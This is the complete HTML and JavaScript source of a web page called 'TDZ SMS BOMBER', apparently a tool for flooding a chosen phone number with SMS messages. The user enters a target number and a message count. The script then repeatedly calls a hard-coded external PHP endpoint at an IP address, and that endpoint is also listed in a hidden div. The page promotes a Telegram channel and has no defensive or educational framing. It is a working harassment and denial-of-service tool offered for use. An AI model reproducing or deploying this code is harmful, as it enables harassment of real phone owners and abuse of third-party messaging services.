<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>TDZ SMS BOMBER | Tuhin Droid Zone</title>
    <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.4.0/css/all.min.css">
    <style>
        * {
            margin: 0;
            padding: 0;
            box-sizing: border-box;
            font-family: 'Segoe UI', Tahoma, Geneva, Verdana, sans-serif;
        }
        
        body {
            background: linear-gradient(135deg, #0f2027, #203a43, #2c5364);
            color: #333;
            min-height: 100vh;
            padding: 20px;
            display: flex;
            justify-content: center;
            align-items: center;
        }
        
        .container {
            max-width: 800px;
            width: 100%;
            background: rgba(255, 255, 255, 0.97);
            border-radius: 15px;
            box-shadow: 0 15px 35px rgba(0, 0, 0, 0.3);
            overflow: hidden;
        }
        
        header {
            background: linear-gradient(90deg, #1a2a6c, #b21f1f, #fdbb2d);
            color: white;
            padding: 25px;
            text-align: center;
            position: relative;
        }
        
        .logo {
            font-size: 2.5rem;
            margin-bottom: 15px;
        }
        
        h1 {
            font-size: 2.2rem;
            margin-bottom: 10px;
            font-weight: 700;
            text-shadow: 2px 2px 4px rgba(0,0,0,0.3);
        }
        
        .subtitle {
            font-size: 1.1rem;
            opacity: 0.9;
            max-width: 600px;
            margin: 0 auto;
        }
        
        .telegram-link {
            display: inline-block;
            margin-top: 15px;
            padding: 10px 20px;
            background: rgba(255,255,255,0.2);
            border-radius: 25px;
            color: white;
            text-decoration: none;
            font-weight: 600;
            transition: all 0.3s;
        }
        
        .telegram-link:hover {
            background: rgba(255,255,255,0.3);
            transform: translateY(-2px);
        }
        
        .content {
            padding: 30px;
        }
        
        .service-title {
            text-align: center;
            margin-bottom: 25px;
            color: #2c3e50;
            font-size: 1.8rem;
            position: relative;
            padding-bottom: 10px;
        }
        
        .service-title:after {
            content: '';
            position: absolute;
            bottom: 0;
            left: 50%;
            transform: translateX(-50%);
            width: 100px;
            height: 3px;
            background: linear-gradient(90deg, #1a2a6c, #b21f1f);
            border-radius: 3px;
        }
        
        .input-group {
            margin-bottom: 20px;
        }
        
        .input-group label {
            display: block;
            margin-bottom: 8px;
            font-weight: 600;
            color: #2c3e50;
            display: flex;
            align-items: center;
            gap: 8px;
        }
        
        .input-group input {
            width: 100%;
            padding: 14px 15px;
            border: 2px solid #ddd;
            border-radius: 8px;
            font-size: 16px;
            transition: border-color 0.3s;
        }
        
        .input-group input:focus {
            border-color: #3498db;
            outline: none;
            box-shadow: 0 0 0 3px rgba(52, 152, 219, 0.2);
        }
        
        .btn-container {
            display: flex;
            gap: 15px;
            margin-top: 25px;
            flex-wrap: wrap;
        }
        
        .btn {
            display: inline-flex;
            align-items: center;
            gap: 8px;
            padding: 14px 25px;
            background: #3498db;
            color: white;
            border: none;
            border-radius: 8px;
            font-size: 16px;
            font-weight: 600;
            cursor: pointer;
            transition: all 0.3s;
            box-shadow: 0 4px 6px rgba(0,0,0,0.1);
            flex: 1;
            justify-content: center;
        }
        
        .btn:hover {
            background: #2980b9;
            transform: translateY(-2px);
            box-shadow: 0 6px 8px rgba(0,0,0,0.15);
        }
        
        .btn:active {
            transform: translateY(0);
            box-shadow: 0 2px 4px rgba(0,0,0,0.1);
        }
        
        .btn-danger {
            background: #e74c3c;
        }
        
        .btn-danger:hover {
            background: #c0392b;
        }
        
        .response-box {
            margin-top: 25px;
            padding: 20px;
            background: white;
            border-radius: 8px;
            border: 2px dashed #ddd;
            min-height: 100px;
            font-family: 'Fira Code', monospace;
            white-space: pre-wrap;
            word-break: break-all;
            font-size: 14px;
            line-height: 1.5;
            box-shadow: inset 0 2px 4px rgba(0,0,0,0.05);
            overflow-y: auto;
            max-height: 200px;
        }
        
        .counter {
            display: flex;
            justify-content: center;
            gap: 15px;
            margin-top: 15px;
        }
        
        .counter-item {
            background: #f8f9fa;
            padding: 10px 15px;
            border-radius: 8px;
            min-width: 80px;
            text-align: center;
            box-shadow: 0 2px 4px rgba(0,0,0,0.1);
        }
        
        .counter-number {
            font-size: 1.5rem;
            font-weight: 700;
            margin-bottom: 5px;
            color: #2c3e50;
        }
        
        .counter-label {
            font-size: 0.8rem;
            color: #6c757d;
        }
        
        footer {
            text-align: center;
            padding: 20px;
            background: #2c3e50;
            color: white;
            font-size: 14px;
        }
        
        .developer-info {
            margin-top: 15px;
            padding: 15px;
            background: rgba(255,255,255,0.1);
            border-radius: 8px;
            font-size: 0.9rem;
        }
        
        .developer-info a {
            color: #fdbb2d;
            text-decoration: none;
        }
        
        .developer-info a:hover {
            text-decoration: underline;
        }
        
        .loader {
            display: inline-block;
            width: 20px;
            height: 20px;
            border: 3px solid rgba(255,255,255,.3);
            border-radius: 50%;
            border-top-color: #fff;
            animation: spin 1s ease-in-out infinite;
        }
        
        @keyframes spin {
            to { transform: rotate(360deg); }
        }
        
        .hidden-api {
            display: none;
        }
        
        @media (max-width: 600px) {
            .btn-container {
                flex-direction: column;
            }
            
            .counter {
                flex-wrap: wrap;
            }
        }
    </style>
</head>
<body>
    <div class="container">
        <header>
            <div class="logo">
                <i class="fas fa-bomb"></i>
            </div>
            <h1>TDZ SMS BOMBER</h1>
            <p class="subtitle">Advanced SMS Service By
           </p>Tuhin Droid Zone</p>
            <a href="https://t.me/+H38YPe-apxE2OTFl" class="telegram-link" target="_blank">
                <i class="fab fa-telegram-plane"></i> Join Telegram Channel
            </a>
            
            <!-- Hidden API information -->
            <div class="hidden-api">
                API: http://154.12.255.143/~nerobfun/andev.php?num=
            </div>
        </header>
        
        <div class="content">
            <h2 class="service-title">SMS Bombing Service</h2>
            
            <div class="input-group">
                <label for="phone"><i class="fas fa-phone"></i> Target Phone Number</label>
                <input type="text" id="phone" placeholder="Enter phone number with country code (e.g., +8801712345678)" value="">
            </div>
            
            <div class="input-group">
                <label for="count"><i class="fas fa-bomb"></i> Number of Messages</label>
                <input type="number" id="count" placeholder="Enter number of messages to send" value="10" min="1" max="100">
            </div>
            
            <div class="btn-container">
                <button class="btn btn-danger" id="start-btn">
                    <i class="fas fa-play"></i> Start SMS Bombing
                </button>
                
                <button class="btn" id="stop-btn">
                    <i class="fas fa-stop"></i> Stop Process
                </button>
            </div>
            
            <div class="response-box" id="response">
// System Ready
// Enter phone number and press Start
            </div>
            
            <div class="counter">
                <div class="counter-item">
                    <div class="counter-number" id="sent-counter">0</div>
                    <div class="counter-label">Messages Sent</div>
                </div>
                <div class="counter-item">
                    <div class="counter-number" id="success-counter">0</div>
                    <div class="counter-label">Successful</div>
                </div>
                <div class="counter-item">
                    <div class="counter-number" id="failed-counter">0</div>
                    <div class="counter-label">Failed</div>
                </div>
            </div>
        </div>
        
        <footer>
            <p>© 2025 Yeasinul Hoque Tuhin | Tuhin Droid Zone</p>
            
            <div class="developer-info">
                Developer: <a href="https://yeasinulhoquetuhin.pages.dev" target="_blank">Yeasinul Hoque Tuhin</a>
            </div>
        </footer>
    </div>

    <script>
        document.addEventListener('DOMContentLoaded', function() {
            const startBtn = document.getElementById('start-btn');
            const stopBtn = document.getElementById('stop-btn');
            const responseBox = document.getElementById('response');
            const sentCounter = document.getElementById('sent-counter');
            const successCounter = document.getElementById('success-counter');
            const failedCounter = document.getElementById('failed-counter');
            
            let isBombing = false;
            let bombingInterval;
            let sent = 0;
            let success = 0;
            let failed = 0;
            
            // Start SMS bombing
            startBtn.addEventListener('click', function() {
                const phone = document.getElementById('phone').value.trim();
                const count = parseInt(document.getElementById('count').value) || 10;
                
                if (!phone) {
                    responseBox.innerHTML = "❌ Error: Please enter a phone number";
                    return;
                }
                
                if (phone.length < 10) {
                    responseBox.innerHTML = "❌ Error: Please enter a valid phone number";
                    return;
                }
                
                isBombing = true;
                startBtn.disabled = true;
                startBtn.innerHTML = '<span class="loader"></span> Bombing...';
                
                responseBox.innerHTML = "🚀 Starting SMS bombing process...\n";
                responseBox.innerHTML += `📱 Target: ${phone}\n`;
                responseBox.innerHTML += `💣 Messages: ${count}\n\n`;
                
                let current = 0;
                
                bombingInterval = setInterval(() => {
                    if (!isBombing || current >= count) {
                        clearInterval(bombingInterval);
                        isBombing = false;
                        startBtn.disabled = false;
                        startBtn.innerHTML = '<i class="fas fa-play"></i> Start SMS Bombing';
                        responseBox.innerHTML += `\n✅ Process completed!\nSent: ${sent}, Success: ${success}, Failed: ${failed}`;
                        return;
                    }
                    
                    current++;
                    sent++;
                    sentCounter.textContent = sent;
                    
                    // Make API request
                    const apiUrl = `http://154.12.255.143/~nerobfun/andev.php?num=${encodeURIComponent(phone)}`;
                    
                    responseBox.innerHTML += `Sending message ${current}/${count} to ${phone}...\n`;
                    responseBox.scrollTop = responseBox.scrollHeight;
                    
                    fetch(apiUrl)
                        .then(response => {
                            if (response.ok) {
                                success++;
                                successCounter.textContent = success;
                                responseBox.innerHTML += `✅ Message ${current} sent successfully\n`;
                            } else {
                                failed++;
                                failedCounter.textContent = failed;
                                responseBox.innerHTML += `❌ Message ${current} failed to send\n`;
                            }
                            return response.text();
                        })
                        .catch(error => {
                            failed++;
                            failedCounter.textContent = failed;
                            responseBox.innerHTML += `❌ Message ${current} failed: ${error.message}\n`;
                        });
                        
                    responseBox.scrollTop = responseBox.scrollHeight;
                }, 1500);
            });
            
            // Stop SMS bombing
            stopBtn.addEventListener('click', function() {
                if (isBombing) {
                    clearInterval(bombingInterval);
                    isBombing = false;
                    startBtn.disabled = false;
                    startBtn.innerHTML = '<i class="fas fa-play"></i> Start SMS Bombing';
                    responseBox.innerHTML += `\n⏹️ Process stopped by user\nSent: ${sent}, Success: ${success}, Failed: ${failed}`;
                }
            });
        });
    </script>
</body>
</html>